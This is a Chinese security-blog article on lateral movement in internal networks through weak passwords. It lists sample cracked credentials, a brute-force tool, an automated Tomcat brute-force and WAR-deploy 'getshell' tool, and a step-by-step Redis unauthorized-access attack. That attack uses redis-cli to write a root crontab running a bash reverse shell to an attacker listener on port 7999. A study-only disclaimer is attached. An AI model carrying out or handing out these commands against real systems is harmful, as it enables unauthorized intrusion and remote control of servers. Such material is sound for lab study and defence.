内网渗透之横向渗透的一些弱口令思路分享

0x01 内网弱口令

RDP、SMB弱口令 192.168.232.136 user1/user1***   win7
SSH弱口令      192.168.232.180 root/rootroot   centos
MSSQL弱口令    192.168.232.135 sa/sa123***     win2012‐iis
Tomcat弱口令   http://192.168.111.145:8080/manager/html
Redis未授权

工具下载:

https://github.com/shack2/SNETCracker

0x02 RDP、SMB弱口令

0x04 Tomcat弱口令

使用方法

上传war.exe和666.war文件
运行 war.exe ‐‐cidr 172.17.2.0/24
会自动扫描C段的tomcat,并且跑弱口令。成功跑出则会自动部署war上传getshell。
扫描日志记录在当前文件夹下的log.txt里

0x05 Redis未授权

同样通过超级弱口令工具扫描redis

利用计划任务执行命令反弹shell

在redis以root权限运行时可以写crontab来执行命令反弹shell

先在自己的服务器上监听一个端口

nc ‐lvnp 7999

然后执行命令:

root@kali:## redis‐cli ‐h 192.168.63.130

      192.168.63.130:6379> set x "\n* * * * * bash ‐i >& /dev/tcp/192.168.63.128/7999 0>&1\n"
      192.168.63.130:6379> config set dir /var/spool/cron/
      192.168.63.130:6379> config set dbfilename root
      192.168.63.130:6379> save


就OK了


版权保护: 本文由蓝域安全网所发布,转载请保留本文链接: http://www.yemogege.cn/wzaq-stwz/527.html

上一篇:Mysql UDF以及SQL server命令执行

下一篇:没有了

免责声明:蓝域安全网所发布的一切渗透技术视频文章,逆向脱壳病毒分析教程,以及相关实用源码仅限用于学习和研究目的
请勿用于商业用途。如有侵权、不妥之处,请联系站长并出示版权证明以便删除! 

侵权删帖/违法举报/投稿等事物联系邮箱:yemogege@vip.qq.com 网站地图